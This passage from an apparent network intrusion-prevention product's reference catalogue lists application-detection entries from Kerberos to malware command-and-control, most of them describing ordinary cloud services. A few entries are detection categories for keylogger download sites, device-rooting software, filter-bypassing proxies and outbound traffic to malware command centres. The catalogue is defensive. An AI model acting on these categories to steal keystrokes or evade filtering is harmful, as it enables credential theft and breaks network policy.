About this situation: Kerberos traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1185-5242
Description: Kerberos is a computer network authentication protocol.
Back to top

Kerio

About this situation: Application Kerio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kerio is a provider of complete IT infrastructure solutions, allows businesses to connect, communicate, and collaborate securely.
Back to top

Kerio-VPN

About this situation: Kerio VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-939-5242
Description: Kerio VPN service is offered through Kerio Control gateway product. The feature allows users to connect remotely to the gateway using secure VPN connection.
Back to top

Kerridgecs

About this situation: Application Kerridgecs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kerridge are a specialist software and services company with a unique depth of knowledge and experience in the distributive trades, comprising wholesalers, distributors, merchants and retailers.
Back to top

Kewill

About this situation: Application Kewill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kewill, a Francisco Partners portfolio company, is a provider in multimodal transportation management software, providing organizations with a comprehensive end-to-end platform for managing the complexities of transportation, logistics and trade compliance.
Back to top

Keybase

About this situation: Application Keybase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keybase provides Web verification and encryption software solutions for social media users.
Back to top

KeyedIn-Projects

About this situation: Application KeyedIn-Projects detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KeyedIn simplifies processes, improves performance and drives results with Cloud-based application development, project management and manufacturing system.
Back to top

Keyloggers

About this situation: Sites that download programs that record all keystrokes, and which may send those keystrokes (potentially including passwords or confidential information) to an external party.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that download programs that record all keystrokes, and which may send those keystrokes (potentially including passwords or confidential information) to an external party.
Back to top

Keymetrics

About this situation: Application Keymetrics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keymetrics is a SaaS monitoring service dedicated to NodeJS. It lets you know when something is going wrong in real time.
Back to top

Keywordspy

About this situation: KeywordSpy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: KeywordSpy provides free SEO and PPC keyword research software tool.
Back to top

Kickload

About this situation: Kickload usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Storage.to/Kickload.com provides online backup, file sharing, and online data storage.
Back to top

Kicksend

About this situation: Kicksend usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A photo-sharing app to send and print photo albums with people.
Back to top

Kickserv

About this situation: Application Kickserv detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kickserv is a web-based CRM application for the field service industry which is easy-to-use. Solution offers customer relationship management (CRM), scheduling, estimates, shared calendar management, mobile access, invoicing, dispatching, and more.
Back to top

Kickstarter

About this situation: Kickstarter usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1078-5242
Description: Kickstarter is a crowdfunding platform.
Back to top

Kielikone-MOT

About this situation: Kielikone MOT usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-916-5242
Last changed: sgpkg-ips-916-5242
Description: MOT is a multilanguage dictionary and translation service provided by Kielikone.
Back to top

Kies

About this situation: Endpoint Context Agent based Samsung Kies detection
Context: EI Correlation
Severity: 1
Tags: Mobile Software, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Samsung Kies endpoint application has been detected.
Back to top

Kii

About this situation: Application Kii detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kii provides scalable cloud backend platform for enterprise applications, consumer apps, mobile games and the Internet of Things (IoT).
Back to top

Kik-Messenger

About this situation: Kik Messenger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1128-5242
Description: Kik Messenger is an instant messaging application for mobile devices.
Back to top

Kimbia

About this situation: Application Kimbia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kimbia provides fundraising and crowdfunding, drives fundraising success for nonprofits seeking to identify and engage supporters.
Back to top

Kinaxis

About this situation: Application Kinaxis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kinaxis delivers a cloud-based solution at the heart of planning and response management for value chain operations. Large manufacturing companies with complex supply chain networks and volatile business environments rely on RapidResponse for collaborative planning, continuous performance monitoring, and coordinated response to plan variances across multiple areas of the business.
Back to top

Kindle-Cloud-Reader

About this situation: Application Kindle-Cloud-Reader detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kindle Cloud Reader is a web app from Amazon that lets read Kindle books, instantly.
Back to top

Kindling-App

About this situation: Application Kindling-App detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kindling App offers management and innovation software for organizations
Back to top

KineticD

About this situation: Application KineticD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KineticD is a cloud backup recovery provider with enterprise-grade features and web-based administrative dashboard.
Back to top

Kineticglue

About this situation: Application Kineticglue detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KineticGlue harnesses these emerging tools to improve sales responsiveness, project management, talent discovery and development. KineticGlue also enables enterprises to establish stronger links with members of their ecosystem such as customers and supply chains.
Back to top

King

About this situation: King usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

KingoRoot

About this situation: Endpoint Context Agent based KingoRoot detection
Context: EI Correlation
Severity: 1
Tags: Possibly Unwanted Software, Endpoint
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: KingoRoot endpoint application has been detected. KingoRoot is a software which is used for rooting mobile devices. The software is developed by Chinese company FingerPower Digital Technology Ltd.
Back to top

Kinja

About this situation: Kinja usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-601-5211
Description: Kinja is a news aggregator service and blogging platform.
Back to top

Kino

About this situation: Kino usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: An online film and video distributor
Back to top

Kintone

About this situation: Application Kintone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kintone fully integrated social collaboration and business application cloud platform that allows internal and external teams to solve business process inefficiencies through database and work flow-driven custom apps, communication and collaboration.
Back to top

Kiosk-Logix

About this situation: Application Kiosk-Logix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kiosk Logix provides software for security, monitoring, and management of remotely deployed kiosks.
Back to top

KiSSFLOW

About this situation: Application KiSSFLOW detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KiSSFLOW is an easy-to-use workflow product built to work exclusively with Google Apps. You can create your workflows and publish it to your Google Apps users. It is workflow product deeply integrated with Google Apps.
Back to top

KISSmetrics

About this situation: Application KISSmetrics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kissmetrics delivers insights and interactions to turn visitors into customers.
Back to top

Kisters

About this situation: Application Kisters detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KISTERS develops software solutions for the sustainable resource management of energy, water and air and for Environmental Protection and Safety, Transportation Telematics and 3D viewing. KISTERS 'hardware sales department supplies equipment
Back to top

Kiva

About this situation: Application Kiva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kiva is an online lending platform connecting online lenders to entrepreneurs across the globe.
Back to top

kkProxy

About this situation: kkProxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: kkProxy is a free SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

Klaviyo

About this situation: Application Klaviyo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Klaviyo is email platform powered by data built for commerce and web businesses.
Back to top

Klipboard

About this situation: Application Klipboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Klipboard is and Enterprise Mobile Field Service App for management of field based staff and going paperless.
Back to top

Klipfolio-Dashboard

About this situation: Application Klipfolio-Dashboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Klipfolio is an online dashboard platform for building real-time business dashboards for your team or your clients.
Back to top

Klix-Media

About this situation: Application Klix-Media detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Klix Media provides solutions for web design and website development.
Back to top

Kloudless

About this situation: Application Kloudless detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kloudless Developer Platform makes it easy for you to build cloud storage services into your applications.
Back to top

KMI-EHS-Software

About this situation: Application KMI-EHS-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KMI EHS software is a complete solution that solves environment and sustainability changes.
Back to top

Knack

About this situation: Application Knack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Knack is an online database, which provides tools to take your own data and build it transform it into an online database.
Back to top

Knight-Online

About this situation: Knight Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: A massive multiplayer online role-playing game (MMORPG); source Wikipedia
Back to top

Knovial-Cloud-Platform

About this situation: Application Knovial-Cloud-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Knovial Cloud provides customers with complete and integrated web CMS, e-Commerce, CRM, and a mobile iPhone and iPad platform.
Back to top

Knowhow-Cloud

About this situation: Application Knowhow-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Knowhow Cloud - secure cloud and backup service.
Back to top

Knowify

About this situation: Application Knowify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Knowify - cloud-based business management tools for small and medium sized businesses.
Back to top

Knowledge-Global

About this situation: Application Knowledge-Global detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Knowledge Global provides technology for energy cost management, carbon or energy management for carbon liable entities.
Back to top

KnowledgeTree

About this situation: Application KnowledgeTree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KnowledgeTree, Inc. provides online software that helps sales and marketing teams discover, manage, and refine the collateral they use in sales engagements.
Back to top

Kochava

About this situation: Application Kochava detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kochava is an integrated control panel for application developers allowing them to
Back to top

Koding

About this situation: Application Koding detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Koding is a cloud-based development environment complete with free VMs, IDE and sudo enabled terminal where you can learn Ruby, Go, Java, NodeJS, PHP, C, C
Back to top

Kofax

About this situation: Application Kofax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kofax is a provider of smart process applications that simplify and transform the First Mile of customer engagement.
Back to top

Kohezion

About this situation: Application Kohezion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kohezion - online database software designed for small and medium businesses. Allows the users to create business applications for their needs, without programming.
Back to top

Komoona

About this situation: Application Komoona detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Komoona is using a one tag integration, implementing advanced algorithmic and machine learning technologies to help our partners achieve superior returns with industry high CPMs.
Back to top

Kona-Company

About this situation: Application Kona-Company detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kona Company is a digital strategy firm, dedicated to providing integrated online marketing solutions.
Back to top

Kongregate

About this situation: Kongregate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

KonnexMe

About this situation: Application KonnexMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KonnexMe is a platform of services connecting financial services professionals with clients.
Back to top

Kontera-Advertisers

About this situation: Application Kontera-Advertisers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kontera understands the world
Back to top

Kontest

About this situation: Application Kontest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kontest is a cutting-edge platform to create and spread contest apps on Facebook, the Web and mobile devices.
Back to top

Kontrollis

About this situation: Application Kontrollis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kontrollis provides data about the production costs, work efficiency of the employees, etc.
Back to top

Kony

About this situation: Application Kony detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kony is the cloud-based mobile application development platform
Back to top

Kool-IM

About this situation: Kool IM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-595-5211
Description: Kool IM is a web-based instant messenger service that allows users to connect to MSN, Google Talk, AIM, ICQ, IRC, Jabber, and Yahoo via a web browser.
Back to top

Kotisivukone

About this situation: Kotisivukone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-750-5211
Description: Kotisivukone is a Finnish web hosting provider.
Back to top

Kpasswd

About this situation: Kpasswd usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Description: Kpasswd is a tool for changing a Kerberos password.
Back to top

KPI-Library

About this situation: Application KPI-Library detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KPI Library automates Key Performance Indicators reporting, specialized in measuring and visualizing metrics and performance trends for business executives
Back to top

Kpi.com

About this situation: kpi.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Kpi.com offers its innovative and cost-effective one stop ERP solution for small and mid-level businesses. It offers seamlessly integrated software that provides a host of applications, which have been designed in mind to reduce on-site back office and administration expenses, while streamlining the core functions of an organisation and providing value addition for clients.
Back to top

KPN

About this situation: Application KPN detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KPN is a provider of ICT services.
Back to top

Kproxy

About this situation: Kproxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1238-5242
Description: KProxy is a web proxy that supports SSL via the HTTPS protocol. The service is used to bypass Internet filtering.
Back to top

Kronos

About this situation: Application Kronos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kronos provides workforce management solutions in the cloud. It enables organizations to control labor costs, compliance risk, and workforce productivity.
Back to top

Krux

About this situation: Krux usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Krux is a company specialized in ad targeting.
Back to top

Krux-Digital

About this situation: Krux Digital traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1764-5242
Description: Krux Digital provides user tracking services for Websites.
Back to top

KTBSOnline.com

About this situation: Application KTBSOnline.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kelly and Associates Insurance Group is an integrated Total Benefits Solution company
Back to top

Ku6

About this situation: Ku6 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-sharing where users can share or view shared video using a web browser.
Back to top

Kubra

About this situation: Application Kubra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KUBRA provides customer experience management solutions to utility, insurance, and government clients in North America.
Back to top

Kudos

About this situation: Application Kudos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kudos is a corporate social network with an employee recognition engine at its core. Designed to connect employees to the organization and to one another, Kudos works to produce an engaged and communicative workforce.
Back to top

Kugoo

About this situation: KuGoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: KuGoo allow users to search songs, download them, and listen to songs whilst downloading them through peer-to-peer. Source: KuGou
Back to top

KumoTeam

About this situation: Application KumoTeam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KumoTeam is SaaS application, service management solution (FSM) with Scheduling, Dispatching, Tracking and Reporting as well as payment capabilities.
Back to top

Kwkly

About this situation: Application Kwkly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kwkly connects you with buyers first, delivering them the property info along with your contact info regardless of whose listing they look at.
Back to top

Kyozou

About this situation: Application Kyozou detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kyozou provides inventory and ecommerce management solutions with listing to eBay, Amazon and Newegg.
Back to top

Kyriba

About this situation: Application Kyriba detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kyriba helps your organization make more effective financial decisions through enhanced visibility into your cash and liquidity positions, and risk exposures.
Back to top

LabCollector

About this situation: Application LabCollector detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LabCollector is an intranet based software, allowing centralized management of lab data.
Back to top

LAbite.com

About this situation: Application LAbite.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LAbite - Food Delivery and Corporate Catering
Back to top

LabLynx

About this situation: Application LabLynx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LabLynx is a Laboratory Informatics provider to deliver a true browser-based Laboratory Information Management Solution
Back to top

LabTech

About this situation: Application LabTech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LabTech Software is the developer of the only remote monitoring and management (RMM) platform
Back to top

Ladbrokes

About this situation: Ladbrokes usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games or obtain information.
Back to top

LahiTapiola

About this situation: LahiTapiola usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: LahiTapiola usage detected. LahiTapiola is a Finnish insurance and banking service provider.
Back to top

Lancope

About this situation: Application Lancope detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lancope is a provider of network visibility and security intelligence to defend enterprises against threats.
Back to top

LANDesk

About this situation: Application LANDesk detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IT Management and Asset Management Systems, Solutions and Tools from LANDESK unify and automate the delivery of assets
Back to top

Lands-End

About this situation: Land's End usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: Land's End is an American clothing company.
Back to top

LANSA

About this situation: Application LANSA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LANSA is a provider of mobile and desktop application development tools, modernization solutions and integration software.
Back to top

Lapio

About this situation: Application Lapio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lapio is an all-in-one race management and timing software providing online registration, payment, LIVE timing, social media integration, photo sharing and more.
Back to top

Laserfiche

About this situation: Application Laserfiche detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Laserfiche has used its Run Smarter philosophy to create simple and elegant enterprise content management solutions.
Back to top

Last.fm

About this situation: Last.fm usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-630-5211
Description: Last.fm is the world's largest online music catalogue. It provides free internet radio, videos, photos, stats, charts, biographies and concerts.
Back to top

Lastline

About this situation: Lastline usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-859-5242
Description: Lastline is a cyber security company that provides network-based breach detection services.
Back to top

LastPass

About this situation: Application LastPass detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LastPass - password management service which seeks to resolve the password fatigue problem by centralising user password management in the cloud. LastPass is standard with a web interface but also includes plugins and apps for many modern web browsers and includes support for bookmarklets.
Back to top

Launchlist-Pro

About this situation: Application Launchlist-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Launchlist helps web designers and developers check their work before exposing it to the world at large.
Back to top

Launchpad

About this situation: Launchpad usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Launchpad is a web application and website that allows users to develop and maintain software, particularly open-source software. Launchpad is developed and maintained by Canonical Ltd. It includes a project registry, code branch registry and mirroring service, bug tracker, specification tracker, translation service, and question tracker
Back to top

LaunchRock

About this situation: Application LaunchRock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LaunchRock is a free web-based application that helps set up a social 'launching soon'
Back to top

Lavabit

About this situation: Lavabit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

Layar

About this situation: Layar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Layar is a mobile browser. The browser allows users to find various items based upon augmented reality technology.Data in the browser comes in the form of layers. Layers are REST web services serving geo-located points of interest in the vicinity of the us.
Back to top

Layered-Tech

About this situation: Application Layered-Tech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Layered Technologies is provider of PCI, HIPAA and FISMA compliant hosting, managed dedicated hosting and cloud computing services.
Back to top

LC_Advanced-Malware-Command And Control

About this situation: ThreatSeeker Advanced Malware Command and Control
Context: Local Correlation
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1210-5242
Description: Protects against outbound transmissions from a compromised machine to a malicious command-and-control center. This inspection situation triggers when ThreatSeeker URL categorization is enabled and the URL matches the referenced URL Category.
Back to top

LC_Advanced-Malware-Payloads

